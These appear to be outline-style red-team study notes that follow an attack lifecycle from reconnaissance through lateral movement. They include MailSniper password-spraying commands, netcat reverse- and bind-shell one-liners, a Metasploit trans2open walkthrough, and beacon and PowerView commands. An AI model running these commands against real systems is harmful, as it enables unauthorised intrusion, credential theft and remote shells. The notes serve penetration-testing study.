Red Teaming

Aligned with the Mandiant Threat Lifecycle

Initial Reconnaissance

research the target systems and employees to develop a methodology for the intrusion.

  • breached credentials

Scanning Infrastrucuture:

Scanning Websites:


subdomain searching

You can combine some simple tools to enumerate and screenshot domains

cat tesla.txt | sort -u | httprobe -s -p https:443
gowitness file -f ./alive.txt -P ./pics --no-http

identify web technology

Initial Compromise

execute malicious code on one or more targets via the attack vector planned during phase 1.

password spraying

  • office 365

    • TREVORspray
      • teams/onecloud/outlook/etc.
  • OWA

    • metasploit → aux/scanner/http/owa_login
  • other portals

    • BURP repeater/intruder..
    • sniper → only one
    • pitchfork → 1st/1st, 2nd/2nd
    • clusterbomb
  • mfasweeper

using mailsniper

While mailsniper is rather used to search through Exchange365, it has multiple modules that allow for password spraying:

Invoke-PasswordSprayOWA -ExchHostname -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
Invoke-PasswordSprayEWS -ExchHostname -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt

check for exploits

  • edb, rapid7
  • searchsploit
    • do this rather fuzzy
    • search for remote exploits


  • reverse shell: “nc -nvlp 4444” und “nc 4444 -e /bin/bash”

  • bind shell: “nc -nvlp 4444 -e /bin/bash” and “nc 4444”

  • meterpreter

    • stages: windows/meterpreter/reverse_tcp vs.
    • non-staged: windows/meterpreter_reverse_tcp
    • then test bind shell (staged/non-staged), not every payload is the right payload
  • gaining root with meterpreter

    • msfconsole
      • search trans2open
      • use exploit/linux/samba/trans2open
      • set RHOST
      • show targets
      • exploit
      • opens and closes meterpreter sessions (reason died)
      • options (now shows payloads)
      • set payload linux/x86/shell_reverse_tcp
      • exploit
  • exploit 80/443 (apache) manually

    • get exploit from github
    • chose the right exploit (from enumeration)
    • this is not real exploit writing..

Establish Foothold

maintain continued control over a compromised system by installing persistent backdoors.

Here we would have host reconnaissance


beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe -group=system

Talking about installing an initial foothold, e.g., Registry Autoruns, Scheduled Tasks, Startup Folder


Escalate Privileges

exploit system vulnerabilities or misconfigurations to obtain local admin access to compromised systems.

linux-priv-esc Windows Enum and Priv-Esc 3_Host_Privilege_Escalation

EDR bypass

Internal Reconnaissance, Priv-Esc and Lateral Movement

explore the target’s internal infrastructure and environment.

Credential threat is happening here maybe?

domain recon

powerview sharpview adsearch

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1

Move Laterally

use credentials obtained from phase 4 to compromise additional systems.

AD Assumed Breach azure background

Maintain Presence

maintain highly privileged access to domains and systems.

with root permissions we can elevate our foothold too

Complete Mission

accomplish the operational objective.